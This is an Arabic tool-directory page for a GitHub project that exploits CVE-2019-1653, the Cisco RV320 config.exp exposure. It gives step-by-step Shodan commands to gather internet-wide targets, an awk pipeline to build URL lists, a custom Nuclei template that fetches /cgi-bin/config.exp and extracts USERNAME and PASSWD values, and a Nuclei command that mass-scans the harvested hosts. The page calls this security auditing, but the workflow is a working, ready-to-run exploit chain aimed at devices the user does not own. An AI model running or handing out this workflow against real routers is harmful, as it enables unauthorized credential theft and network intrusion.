Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
nuclei-CiscoRV320Dump-CVE-2019-1653 — قالب Nuclei آلي وسير عمل Shodan لاكتشاف واستغلال كشف تكوين موجه Cisco (CVE-2019-1653) لتدقيق الأمان. | Kitploit
أدوات/GitHubGitHub/elzerjp/nuclei-ciscorv320dump-cve-2019-1653
الاستخبارات مفتوحة المصدر (OSINT)الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلومات
GitHubelzerjp/nuclei-ciscorv320dump-cve-2019-1653

nuclei-CiscoRV320Dump-CVE-2019-1653

قالب Nuclei آلي وسير عمل Shodan لاكتشاف واستغلال كشف تكوين موجه Cisco (CVE-2019-1653) لتدقيق الأمان.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
46منذ سنة واحدةلم تتم المراجعة بعد

ثغرة تعرض تكوين راوتر Cisco

وصف الثغرة

يشرح هذا المستودع عملية استغلال ثغرة في بعض راوترات Cisco تسمح بكشف ملف التكوين config.exp عبر عنوان URL عام يمكن الوصول إليه. قد يحتوي هذا الملف على معلومات حساسة، بما في ذلك بيانات الاعتماد (USERNAME وPASSWD) وإعدادات الشبكة وتفاصيل حرجة أخرى للنظام. إذا كان يمكن الوصول إليه دون مصادقة، فقد يعرض أمان الجهاز والشبكة التي يعمل عليها للخطر. CVE ذو الصلة

قد تكون هذه الثغرة مرتبطة بـ CVE-2003-1567 و CVE-2019-1653، وكلاهما مرتبط بالكشف غير المصرح به عن ملفات التكوين في أجهزة Cisco، على الرغم من أنه من المهم التحقق مما إذا كان الجهاز والبرامج الثابتة المحددين ينطبق عليهم هذان CVE. دليل خطوة بخطوة للاستغلال

يستخدم هذا الإجراء Shodan لتحديد الأجهزة المعرضة للخطر، متبوعًا بـ Nuclei لمسح والتحقق من كشف التكوينات الحساسة في راوترات Cisco. المتطلبات الأساسية

root@kitploit:~
حساب في Shodan: تأكد من أن لديك حسابًا في Shodan وأن مفتاح API الخاص بك مهيأ للوصول من سطر الأوامر.
Nuclei: مثبت في بيئتك، إلى جانب القالب المخصص لـ Nuclei الموصوف أدناه.
الأدوات: shodan-cli، awk، و httpx لتحويل عناوين IP إلى عناوين URL كاملة.

الخطوة 1: البحث عن الأجهزة المعرضة للخطر في Shodan

الخطوة الأولى هي تحديد الأجهزة المعرضة للخطر في Shodan من خلال بحث متقدم. الاستعلام التالي في Shodan يبحث عن الأجهزة التي يحتمل أن تكون راوترات Cisco:

shodan download apache_results.json.gz "http.favicon.hash:-299287097 Apache"

هذا الأمر:

root@kitploit:~
يقوم بإجراء بحث في Shodan لتحديد الأجهزة التي تحتوي على أيقونة Apache، مع تجزئة محددة تحدد الخوادم التي قد تكون مرتبطة بـ Apache. هذا مفيد في سياق مراجعة الخوادم.

الخطوة 2: تنزيل النتائج وتنسيق عناوين URL

بمجرد الحصول على ملف apache_results.json.gz، الخطوة التالية هي استخراج عناوين IP والمنافذ لكل جهاز لتنسيقها في عناوين URL كاملة، بما في ذلك البروتوكول (http أو https) والمنفذ. أمر لمعالجة البيانات من ملف .json

استخدم الأمر التالي لاستخراج عناوين IP والمنافذ وتنسيقها في عناوين URL كاملة في ملف باسم urls.txt:

shodan parse --fields ip_str,port,ssl.version apache_results.json.gz |
awk '{if ($2 == 443 || $3 ~ /https/) print "https://"$1":"$2; else print "http://"$1":"$2}' > urls.txt

root@kitploit:~
shodan parse: يستخرج عناوين IP والمنافذ من كل نتيجة في ملف `apache_results.json.gz`.
awk: يقوم بتنسيق المخرجات في عناوين URL كاملة، باستخدام https إذا كان المنفذ 443 أو تم اكتشاف SSL، و http في الحالات الأخرى.

الآن يحتوي ملف urls.txt على عناوين URL كاملة ومنسقة. الخطوة 3: إنشاء قالب مخصص لـ Nuclei

للتحقق مما إذا كان ملف config.exp قابل للوصول في هذه الأجهزة، سنستخدم قالبًا مخصصًا لـ Nuclei. سيحاول هذا القالب الوصول إلى الملف واستخراج بيانات حساسة مثل USERNAME وPASSWD إذا كانت موجودة. قالب Nuclei (cisco-router-config-exposure.yaml)

id: cisco-router-config-exposure info: name: Cisco Router Configuration Exposure author: elzer severity: high description: | Detecta la exposición del archivo config.exp en routers Cisco que contiene credenciales y configuraciones críticas.

tags:

  • cisco
  • router
  • vulnerability
  • cgi-bin
  • config.exp

requests:

  • method: GET path:

    • "{{BaseURL}}/cgi-bin/config.exp"

    matchers-condition: or matchers:

    • type: word words:
      • "Cisco"
      • "config"
      • "version"
    • type: regex regex:
      • "USERNAME=\w+"
      • "PASSWD=[a-f0-9]{32}"

هذا القالب:

root@kitploit:~
يرسل طلب GET إلى الملف `/cgi-bin/config.exp`.
يتحقق مما إذا كان الرد يحتوي على كلمات رئيسية أو أنماط محددة (Cisco، config، version) لتأكيد الكشف.
يحاول استخراج قيم USERNAME وPASSWD إذا كانت موجودة في الملف.

احفظ هذا القالب باسم cisco-router-config-exposure.yaml في مجلد قوالب Nuclei. الخطوة 4: تشغيل Nuclei لاكتشاف الأجهزة المعرضة للخطر

بعد تجهيز القالب وملف urls.txt، قم بتشغيل أمر Nuclei التالي لمسح عناوين URL:

nuclei -t path/to/cisco-router-config-exposure.yaml -l urls.txt -o resultados_nuclei.txt -debug -vv

root@kitploit:~
`-t path/to/cisco-router-config-exposure.yaml`: يشير إلى القالب المخصص الذي أنشأناه.
`-l urls.txt`: يستخدم ملف `urls.txt` مع عناوين URL المنسقة.
`-o resultados_nuclei.txt`: يحفظ النتائج في ملف `resultados_nuclei.txt`.
`-debug -vv`: يشغل Nuclei في وضع مفصل لمشاهدة التقدم وتفاصيل التصحيح.

النتيجة

بعد تشغيل Nuclei، سيحتوي ملف resultados_nuclei.txt على قائمة بالأجهزة المعرضة للخطر التي تكشف عن ملف التكوين config.exp. يشمل ذلك أي جهاز يعيد بيانات اعتماد أو تكوينات حساسة، مما يؤكد كشف الثغرة. الخلاصة

تتيح لك هذه العملية تحديد وتأكيد كشف ملفات التكوين الحرجة في أجهزة Cisco باستخدام Shodan و Nuclei. أتمتة هذا التدفق مفيدة بشكل خاص لمراجعي الأمن ومحترفي الأمن السيبراني المهتمين بتحديد ومعالجة التكوينات غير الآمنة في شبكات الشركات.

تنزيل الأداة